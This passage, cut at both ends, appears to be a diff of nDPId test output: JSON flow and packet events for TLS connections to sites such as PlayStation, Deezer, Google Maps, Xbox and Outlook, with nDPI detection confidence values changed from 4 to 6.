{"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482896911,"flow_last_seen":1646482896911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482896911,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1646482896911,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896911,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPpAAEAGn8vAqAGAbIrHQ6iOAbuXn2EUAAAAAKAC+vCb0AAAAgQFtAQCCApW0sF4AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1646482896918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896918,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8E58AAPcGuiZsisdDwKgBgAG7qI5txRYul59hFaAS\/\/+2KgAAAgQFoAQCCAqPYc1DVtLBeAEDAwg="} 
01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1646482896921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482896921,"pkt":"pJGxgjQ5PKn0qB\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"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482916232,"flow_last_seen":1646482916232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482916232,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1646482916232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916232,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ooZAAEAGcYnAqAGAEkFSQ8tmAFAueWmfAAAAAKAC+vBogwAAAgQFtAQCCApZaACoAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1646482916249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916249,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Lu8AAPcGbiASQVJDwKgBgABQy2YtbN9PLnlpoKAS\/\/+hEQAAAgQFoAQCCAqviQYeWWgAqAEDAwk="} 
@@ -213,128 +213,128 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1646482940480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA806FAAEAGYWnAqAGAjvq0jpfKAbsw63pbAAAAAKAC+vDytAAAAgQFtAQCCAoU3PsAAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1646482940487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940487,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8FycAAHkGJGSO+rSOwKgBgAG7l8rhydulMOt6XKAS\/\/9c9AAAAgQFlgQCCAqRbEHhFNz7AAEDAwg="} 01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1646482940491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482940491,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI506NAAEAGX2rAqAGAjvq0jpfKAbsw63pc4cnbpoAYAfb+6AAAAQEIChTc+wqRbEHhFgMBAgABAAH8AwO7ribOnVQsY1sOMkcbEYXbLY3qPQQ51Elay7+WtVSrNSAVw+m3VKjUN5Kg0hk0Rcql0l9JhorDl+A6BcRaD2MOQwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAUABIAAA9tYXBzLmdvb2dsZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgZi1V3KN\/7YwDfK8H3VIJ+hl8oG\/pcyHsJbGlMXjOc2MAFwBBBJu4yUB5A9M8e+22tNqv37PZXfAJovqkKxk\/cRDsm65QH7HDIBoXPUoAJy1c6x2wwBosAz8dzXVrLnN4Hqic9PsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhwAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482995689,"flow_last_seen":1646482995689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482995689,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1646482995689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995689,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8enxAAEAGb8fAqAGAAhGMP78GAburV\/8MAAAAAKAC+vDqEgAAAgQFtAQCCArEqeKzAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1646482995709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8kMCEYw\/wKgBgAG7vwYhgnsXq1f\/DaAS\/ohOCgAAAgQFtAQCCAocht8\/xKniswEDAwc="} 
01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1646482995711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482995711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5en5AAEAGbcjAqAGAAhGMP78GAburV\/8NIYJ7GIAYAfY3gAAAAQEICsSp4socht8\/FgMBAgABAAH8AwNFE1YF0dNQQhTDT2LTts3l72ip1ON6WYuBYFjp45zAOSCfsggN3rEBQ1caacueVCEG9V0G2r03kBuc\/FQ9ILx8tQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBhY2NvdW50Lnhib3guY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIKOdg7M8WplrJ1dHmYhafGTWEV65\/XHCmgpJRZB9OyhxABcAQQSUMlyZp7X5PylQs43MbEemG5LZD4aMK86EfSyduzhW1kr6wtZBIJI7MJb\/MCOqF0\/ebXOaYXIP5autWsClQmu8ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646483012464,"flow_last_seen":1646483012464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646483012464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1646483012464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646483012464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NmFAAEAGec\/AqAGAKGGgApuUAbvrsR4tAAAAAKAC+vCXKwAAAgQFtAQCCAqLefivAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1646483012642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646483012642,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0h61AAOYGgoooYaACwKgBgAG7m5Tksd5d67EeLoAS\/\/96NQAAAgQFtAEDAwgBAQQC"} 01149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1646483012643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646483012643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItNmNAAEAGd9zAqAGAKGGgApuUAbvrsR4u5LHeXlAYAfZhOgAAFgMBAgABAAH8AwO1u+oefRTEOwSLQjLjHhVV0xmNEBLIePou\/aAHVOd2CCAPyrTST2MnYmbxM2VIZnvQo7xJWWszq6XT0HB3y7IoMAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtvdXRsb29rLmNvbQAXAAD\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"} 
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 